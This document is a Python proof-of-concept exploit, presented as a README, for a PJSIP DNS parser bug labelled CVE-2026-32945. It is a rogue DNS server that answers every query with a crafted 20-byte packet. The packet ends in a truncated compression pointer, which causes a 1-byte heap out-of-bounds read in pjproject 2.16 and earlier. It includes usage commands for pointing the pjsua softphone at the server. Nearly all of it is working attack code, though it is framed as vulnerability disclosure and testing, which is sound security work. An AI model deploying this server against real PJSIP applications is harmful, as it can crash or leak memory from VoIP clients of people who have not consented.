README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-32945 PJSIP DNS parser 1-byte heap OOB read (network PoC)
This script is a rogue DNS server that responds to any A query with a crafted
DNS response containing a truncated compression pointer as the last byte of the
packet. Any PJSIP application using pjproject <= 2.16 that resolves a domain
through this server will hit the 1-byte OOB read in get_name_len().
Usage:
# Terminal 1 -- start the rogue DNS server (needs root or cap_net_bind_service
# for port 53; use port 5353 for non-root testing)
python3 poc.py [--port PORT] [--bind ADDR]
# Terminal 2 -- trigger a DNS resolution via the rogue server.
# For pjsua (pjproject SIP softphone):
# pjsua --nameserver 127.0.0.1:5353 sip:[email protected]
#
# For a quick test with dig:
# dig @127.0.0.1 -p 5353 evil.test A
# (dig will not crash; only the PJSIP parser is vulnerable)
Packet layout (20 bytes):
[DNS Header -- 12 bytes]
ID=0x1234, Flags=0x8180 (QR=1 AA=1 RD=1 RA=1)
QDCOUNT=1, ANCOUNT=1, NSCOUNT=0, ARCOUNT=0
[Question Section -- 7 bytes]
QNAME: "a." (0x01 0x61 0x00)
QTYPE: A (0x0001), QCLASS: IN (0x0001)
[Answer RR name -- 1 byte]
0xC0 <-- compression pointer, high byte only.
This is the last byte of the 20-byte packet.
PJSIP's get_name_len() reads 2 bytes here without
checking p+1 < max, reading 1 byte past the buffer.
Dependency: none (stdlib only).
"""
import argparse
import socket
import struct
import sys
CRAFTED_RESPONSE = bytes([
# DNS Header (12 bytes)
0x12, 0x34, # Transaction ID (echo'd from query in real use)
0x81, 0x80, # Flags: QR=1 AA=1 RD=1 RA=1
0x00, 0x01, # QDCOUNT = 1
0x00, 0x01, # ANCOUNT = 1
0x00, 0x00, # NSCOUNT = 0
0x00, 0x00, # ARCOUNT = 0
# Question Section (7 bytes)
0x01, 0x61, 0x00, # QNAME: "a." (label "a" + end)
0x00, 0x01, # QTYPE = A
0x00, 0x01, # QCLASS = IN
# Answer RR name: just the first byte of a compression pointer.
# 0xC0 has the top two bits set (0b11000000), marking it as a
# compression pointer. The second byte (the low byte of the 14-bit
# offset) is missing -- the packet ends here.
#
# PJSIP's get_name_len() / get_name() detect 0xC0 and call
# pj_memcpy(&offset, p, 2) without first checking p+1 < max.
# p points to this 0xC0 byte; p+1 is one byte past the buffer end.
0xC0, # <-- byte 19, the last (and only) byte of the answer RR name
])
def build_response_for_query(query: bytes) -> bytes:
"""
Build a crafted response, echoing the transaction ID from the query
so that PJSIP's resolver matches the response to the pending request.
"""
resp = bytearray(CRAFTED_RESPONSE)
if len(query) >= 2:
# Copy transaction ID from query into response
resp[0] = query[0]
resp[1] = query[1]
return bytes(resp)
def main():
parser = argparse.ArgumentParser(
description="CVE-2026-32945 rogue DNS server")
parser.add_argument("--port", type=int, default=5353,
help="UDP port to listen on (default 5353)")
parser.add_argument("--bind", default="0.0.0.0",
help="Address to bind (default 0.0.0.0)")
args = parser.parse_args()
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
sock.bind((args.bind, args.port))
except PermissionError:
print(f"ERROR: cannot bind to port {args.port}. "
"Try a port > 1024 or run as root.", file=sys.stderr)
sys.exit(1)
print(f"CVE-2026-32945 rogue DNS server listening on "
f"{args.bind}:{args.port}/udp")
print(f"Crafted response: {len(CRAFTED_RESPONSE)} bytes, "
f"last byte 0x{CRAFTED_RESPONSE[-1]:02X} (truncated compression pointer)")
print()
print("Waiting for DNS queries ...")
print("Point a PJSIP application at this server:")
print(f" pjsua --nameserver 127.0.0.1:{args.port} sip:[email protected]")
print()
while True:
try:
data, addr = sock.recvfrom(4096)
except KeyboardInterrupt:
print("\nShutting down.")
break
qtype_str = "?"
qname = ""
try:
# Minimal DNS query decode for logging
if len(data) >= 12:
qdcount = struct.unpack("!H", data[4:6])[0]
if qdcount >= 1:
# Parse first QNAME
pos = 12
labels = []
while pos < len(data) and data[pos] != 0:
llen = data[pos]
pos += 1
labels.append(data[pos:pos+llen].decode("ascii", errors="replace"))
pos += llen
qname = ".".join(labels) + "."
pos += 1 # skip terminating \x00
if pos + 4 <= len(data):
qtype = struct.unpack("!H", data[pos:pos+2])[0]
qtype_str = {1: "A", 28: "AAAA", 33: "SRV",
255: "ANY"}.get(qtype, str(qtype))
except Exception:
pass
resp = build_response_for_query(data)
sock.sendto(resp, addr)
print(f" Query from {addr[0]}:{addr[1]} QNAME={qname!r:40s} "
f"QTYPE={qtype_str:5s} "
f"--> sent {len(resp)}-byte crafted response "
f"(last byte 0x{resp[-1]:02X})")
if __name__ == "__main__":
main()